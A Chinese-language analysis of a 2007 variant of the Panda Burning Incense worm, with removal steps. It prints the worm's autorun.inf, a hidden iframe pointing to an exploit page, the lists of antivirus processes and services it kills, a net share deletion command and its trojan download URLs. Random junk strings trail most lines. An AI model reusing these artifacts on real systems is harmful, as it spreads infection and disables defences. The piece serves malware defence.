熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe A
: O"N  
TU*Y?D L  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） Wjli(sT#-  
VV/aec8  
中文名称：（尼姆亚，熊猫烧香） '?
6j.ms M  
)|GYxG;8C  
病毒大小：68,570 字节 rYM@e  
~ \b~
 
编写语言：Borland Delphi 6.0 - 7.0 7#7AK}  
qFI19`?8E  
加壳方式：FSG 2.0 -> bart/xt *6G@8TIh  
AzVv-!Y  
发现时间：2007.1.16 |'j,|^<  
i
Z4"@G:,  
危害等级：高 ^mouWw)a_  
p||mR  
一、病毒描述： BDCyeC,Q3  
"y60YYn-#J  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 - LB}=  
QZ+G2$  
二：中毒现象： JL[!8NyU  
Hp*N
%  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 Ed+jSO0  
O=jzz&E+  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 F##xVmR~  
V{fG~19  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 Hzz v 6k  
mNsd&Rk'  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> TuC  
6ld /E  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 Yy;BJ_  
#|T2`uYotf  
6：不能正常使用任务管理器，SREng.exe等工具。 P26"z))~d  
211V'|a_>  
7：无故的向外发包，连接局域网中其他机器。 '.jYu7   
@)wsHW%cjz  
三：技术分析 =mSu^q(l  
\uO^wJ}  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe vpC?JXz=H  
biS{.  
建立注册表自启动项: Y ` Z,52  
=G !]_d0  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] mW~*GD~r  
+|TXKhm{  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" ;/H/Gn+  
 >hzSd@J&  
2：查找反病毒窗体病毒结束相关进程: Y[W:Zhl;  
N( f0,  
天网防火墙 R\<d&+q@  
W0}FOfL9  
virusscan V9Dq<y-y  
"xnULQK  
symantec antivirus yF1p^>*ak&  
qj
4jM7  
system safety monitor j6j4M,UI43  
%m|1LI(  
system repair engineer Hv2[=elc  
@>8{J6%\  
wrapped gift killer /,~g"y.;,  
yE~D0%Umq  
游戏木马检测大师 dK;ebg9|  
KT17I&:  
超级巡警 7fXJP5j  
-<sW`HpD'  
3：结束以下进程: VGc.yM)& j  
#<s"?Y%-  
mcshield.exe C XNYWx  
,9MNB3  
vstskmgr.exe p=^6V"'  
0JKTwLhC  
naprdmgr.exe /`0>U  
'Hs*  
updaterui.exe L$rr:^J  
T%;NW|mH&  
tbmon.exe 4TYtgP1  
u \<APn  
scan32.exe &C)97E  
Ypxp4B  
ravmond.exe < +kdL  
mD|Q+~=|e  
ccenter.exe _'<FBlIN  
'&2-{Y [!  
ravtask.exe hc|#JS2H@y  
o,S(;6pDJ  
rav.exe 6{0MprY  
4#:C t* f  
ravmon.exe z`NJelcuz\  
V-E 77u6{0  
ravmond.exe [_}8Vv&6  
X?;iSekI4  
ravstub.exe }%<_>b\  
yk(r R  
kvxp.kxp Ix<!0! vk  
#sk~L21A  
kvmonxp.kxp =''b`T$  
`M(st%@n  
kvcenter.kxp wAJ=rRI  
WBA7G  
kvsrvxp.exe *B84Y.df  
MmePhHf  
kregex.exe Hs_7oy|P  
Rha|Rk~  
uihost.exe /Ahh6=qQY  
ledr[)  
trojdie.kxp Q1x15pVku/  
z.?slYe[  
frogagent.exe k#7A@Vb  
;t,v/
(/3  
kvxp.kxp F6b;qb6n  
TJ_6:;4,|_  
kvmonxp.kxp Mn<s9ITS-  
rkR~%U6V  
kvcenter.kxp OdNcuiLa  
[1ClZ~f  
kvsrvxp.exe (<-m|H};  
0 0|!g"E>$  
kregex.exe };EB  
TeO'E<@  
uihost.exe UO!} 0'  
Df:/r%  
trojdie.kxp zK{}   
o;#8=q  
frogagent.exe t5u#[*  
='_3qn.  
logo1_.exe $bfmsCcHL  
T:9M|mD  
logo_1.exe [TFp2B~)#  
vts"  
rundl132.exe *K@O3n   

Z glU{sU  
taskmgr.exe IiE^HgM  
(I'{ pF)  
msconfig.exe inZ0iU9dy  
\pTv;(  
regedit.exe dK,=9DQy5  
2;3&&yK2b  
sreng.exe 9 `q(_\x  
4：禁用下列服务: JG1q5j##]b  
7,V_5M;t  
schedule }[MkJ21!  
]=I2:Rb  
sharedaccess x K\i&A  
`P-d. M6Oa  
rsccenter 8bO+[" c  
bn5O2  
rsravmon pSIXv%1J  
pGyk61  
rsccenter bFlI:R&<  
5MZv!N  
kvwsc D/%v/m
pj$  
:(tK
c3z  
kvsrvxp OYn5k6  
7!FiPH~kM  
kvwsc l @@pXg3  
F MYcZ+4  
kvsrvxp @PhAg  
Fi\)ka\u  
kavsvc `w8cV?  
\Cin%S.C  
avp Gl45HyY_  
N2k{@DY  
avp LTH,a?lD  
%W|Sl  
kavsvc !W0JT#0
 
X}
C8!LA  
mcafeeframework X.,R%>O}`P  
;E5XH"L\  
mcshield [fb9;,x`  
QR8]d1+GV  
mctaskmanager @Gw]cm  
0Q,Tcj  
mcafeeframework a>,_o(]cW  
/Dt:4{aTOC  
mcshield ]VtP7Y  
5nceOG8  
mctaskmanager  uk,9N  
Zu4CFX-4  
navapsvc qNrLM!Rj  
eWD!/yr|  
wscsvc |Zp') JiS  
?:l:fS0:{  
kpfwsvc CL-?Mi=Uc  
-~4kh]7%  
sndsrvc o54=^@>O<j  
U7f o4y1}  
ccproxy f(!cz,y^\*  
>qO
l1]uF  
ccevtmgr
$*P+  
r;H#cMj  
ccsetmgr pmi[M)D  
"SWL@}8vx  
spbbcsvc V|HO*HiB3  
CD^@*jH9"  
symantec core lc I|c?*~7*  
aM,g@'.=  
npfmntor s- 0Xt<  
,kYX|8SO  
mskservice xt`a":lru  
1Ak0A6E  
firesvc FJ?]|S.?,  
i??+5o@uTF  
5：删除下列注册表项: 4 EA$<n(A-  
~G6xk/+n-m  
software\microsoft\windows\currentversion\run\ravtask |q\i, }  
dWwb}r(ky  
software\microsoft\windows\currentversion\run\kvmonxp k][{4~z  
(r}StR+  
software\microsoft\windows\currentversion\run\kav Iq6EoDoq  
UX|3LpFX&I  
software\microsoft\windows\currentversion\run\kavpersonal50 rfSEL 57'  
s`.J!^u`  
software\microsoft\windows\currentversion\run\mcafeeupdaterui _25PyG  
7M?Sndp$  
software\microsoft\windows\currentversion\run\network associates error reporting service }20tdD ~  
tO"AeZe%|  
software\microsoft\windows\currentversion\run\shstatexe dI=&gz  
q%/.+g2-\  
software\microsoft\windows\currentversion\run\ylive.exe AAB_Ytf  
uOKdb6]r6  
software\microsoft\windows\currentversion\run\yassistse R /_vJHI  
w&]$!g4  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） JV/:QV  
4wa3$Pk  
7：跳过下列目录: uLI;_,/:  
NPa4I7`A  
windows puEu)m^  
s(L!]d.S$y  
winnt k>!i _lb  
_ph1( !H$  
systemvolumeinformation 3qV\XC+  
e-lc2$o7{  
recycled mfDt_Iq  
ke/4l?zs  
windowsnt kKC] n   
N1vA>(2A  
windowsupdate %)&Tr`  
s,Fts3+  
windowsmediaplayer ~Q]::  
W3%RB[s-  
outlookexpress 
Uhyf  
0+e0<'  
netmeeting
>f|0# *  
qpa}6JVQ+j  
commonfiles KXWz(L!1  
i?mUQ'H  
complusapplications Rdj^k^V+a1  
@bnw$U`+  
commonfiles yy3`E}vX7  
e\*(F3r  
messenger eOZ~p  
tWTC'Gx-J  
installshieldinstallationinformation jOK!k  
;2sP3!*  
msn y4&x`|tv  
9}q)AL-ga  
microsoftfrontpage mFd|JbW  
vP%:\u:{  
moviemaker ~!%G2E!  
plNw>rFa  
msngaminzone +p]@b  
!rG-[7K  
8：删除*.gho备份文件. 'I2[}>mj2  
2xB
h  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. dLR[<@E  
n# FkgXP$  
autorun.inf内容： ;L%\[H>G  
lhBAT%U\  
程序代码 Jt?`(H  
9wdX#=I  
[AutoRun] lJS3*x#H  
OE}c$!@  
OPEN=setup.exe Kc>Rd  
rDc$#  
shellexecute=setup.exe Q7mikg=1-  
%GMCyT  
shell\Auto\command=setup.exe z`]:\j'O3"  
%PK(Z*>  
10：删除共享：cmd.exe /c net share admin$ /del /y pp >F)A0v  
0]GenT"  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 gN<J0c)  
]XYD2fR2qA  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 i&)OJy  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 K_qA[n  
&nY#GHB  
目前下载列表如下： )cm^;(#pV  
T[J8zLO  
http://www.krvkr.com/down/cq.exe K>-01AGHL  
&m TYMpA  
http://www.krvkr.com/down/mh.exe .j"@7#
tW  
A 0;ng2&  
http://www.krvkr.com/down/my.exe }|znQ3A2\l  
SUsdX[byb  
http://www.krvkr.com/down/wl.exe @ xTVX'$  
1h{7dLA  
http://www.krvkr.com/down/rx.exe '\"5qB  
_) UnHp_^  
http://www.krvkr.com/down/wow.exe DYgz;Y/%l  
=}SLQdT  
http://www.krvkr.com/down/zt.exe W"tGCnd  
)k4&S{=  
http://www.krvkr.com/down/wm.exe * C
*aH6*  
t ^1uj:vD  
http://www.krvkr.com/down/dj.exe *nV"X0&  
$3eoZ1q'U-  
http://www.krvkr.com/cn/iechajian.exe mdcsL~R  
MK!Aq^Jz  
到此病毒行为分析完毕。 1I8<6pi-  
\|Y_,fi  
四：Sec120.Com专家解决方案： IPt !gSp  
hF5(1s}e$  
1：关闭网络共享，断开网络。 aTBFF  
\[wbJ  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） _k(&<
1i  
[4;G^{ bX  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 zV"'-iP  
?&VKZSo  
4：删除注册表启动项 _93:_L  
7{NH;U t  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] +IlQZwm~  
Na+h+wD.D  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" dl3}\o_
 
8<=sU
O  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe JX#0<U|L  
\\`(x:\  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 ylQ9Su>o  
FRayB VHL  
7：如果电脑上有脚本文件，将病毒代码全部删除。 S{,|Fa^PPO  
@Z<Z//^k  
8：关闭系统的自动播放功能。 P4 #j;k4P  
4Wa*Pcj  
这样就基本上将病毒清除了